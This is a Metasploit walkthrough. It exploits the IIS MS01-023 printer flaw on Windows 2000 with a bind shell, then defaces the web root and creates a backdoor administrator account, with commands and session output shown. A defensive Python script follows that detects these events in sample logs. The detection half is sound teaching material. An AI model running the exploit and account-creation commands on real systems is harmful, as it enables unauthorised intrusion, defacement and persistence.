Change directory to /pentest/exploits/framework3
cd /pentest/exploits/framework3
Launch MSF Console (Command Line Interface)
./msfconsole
Interact with MSF Console
Display help
msf > help
Search for a specific pattern
msf > search iis
Display information about the exploit module
msf > info windows/iis/ms01_023_printer
Select and use the exploit module
msf > use windows/iis/ms01_023_printer
Display all available payloads
msf > show payloads
Select and use a specific payload
msf > set PAYLOAD windows/shell/bind_tcp
Set the Remote Host (RHOST)
msf > set RHOST 131.107.1.101
Set the port the bind payload listens on at the target (LPORT)
msf > set LPORT 8888
Launch the exploit module
msf > exploit
[*] Started bind handler
[*] Sending stage (240 bytes) to 131.107.1.101
[*] Command shell session 1 opened (131.107.1.252:57346 -> 131.107.1.101:8888) at Tue Sep 28 12:17:55 +0800 2010
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
Test privilege level by writing a file
C:\WINNT\system32>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
Create a user account and add it to the local Administrators group
C:\WINNT\system32>net user hacker password123 /add
net user hacker password123 /add
The command completed successfully.
C:\WINNT\system32>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.
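Seen from the defended host, the session above leaves three recognizable events: a command shell started under the web server, a new local account, and a new member of Administrators. As an added example (not part of the original post), this Python script flags those events in process-creation records. The record layout, the sample lines, the rule names and the assumption that the shell appears as a child of inetinfo.exe are constructed for illustration.

```python
import re

# Constructed process-creation records: "time|parent image|image|command line".
# The field layout is an assumption for this example, not a real log format.
SAMPLE = [
    r"12:17:56|C:\WINNT\system32\inetsrv\inetinfo.exe|C:\WINNT\system32\cmd.exe|cmd.exe",
    r"12:18:40|C:\WINNT\system32\cmd.exe|C:\WINNT\system32\net.exe|net user hacker password123 /add",
    r"12:18:55|C:\WINNT\system32\cmd.exe|C:\WINNT\system32\net.exe|net localgroup administrators hacker /add",
    r"12:20:10|C:\WINNT\explorer.exe|C:\WINNT\system32\net.exe|net use Z: \\fileserver\share",
    r"12:21:00|C:\WINNT\system32\cmd.exe|C:\WINNT\system32\net.exe|net user",
]

WEB_SERVERS = {"inetinfo.exe", "w3wp.exe"}  # IIS processes that should never spawn a shell
SHELLS = {"cmd.exe", "powershell.exe"}
# "net user <name> [password] /add" creates a local account.
USER_ADD = re.compile(r"^net1?(?:\.exe)?\s+user\s+(\S+)(?:\s+.*)?\s+/add\b", re.I)
# "net localgroup administrators <name> /add" grants local admin rights.
GROUP_ADD = re.compile(
    r"^net1?(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(records):
    """Return (time, rule, detail) for every record that matches a rule."""
    alerts = []
    for rec in records:
        when, parent, image, cmdline = rec.split("|", 3)
        cmdline = cmdline.strip()
        if basename(parent) in WEB_SERVERS and basename(image) in SHELLS:
            alerts.append((when, "web_server_spawned_shell", basename(parent)))
        m = USER_ADD.match(cmdline)
        if m:
            alerts.append((when, "local_account_created", m.group(1)))
        m = GROUP_ADD.match(cmdline)
        if m:
            alerts.append((when, "added_to_administrators", m.group(1)))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(*alert, sep="  ")
```

The benign `net use` and bare `net user` records produce no alert, so the rules key on the account and group changes rather than on any use of net.exe.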